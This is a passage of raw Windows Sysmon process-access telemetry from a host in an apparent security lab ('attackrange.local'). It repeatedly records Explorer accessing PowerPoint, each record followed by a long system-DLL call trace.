Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.372{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.356{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.356{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.356{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.356{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x800000000000000081613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x800000000000000081609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x800000000000000081605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:08.340{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft 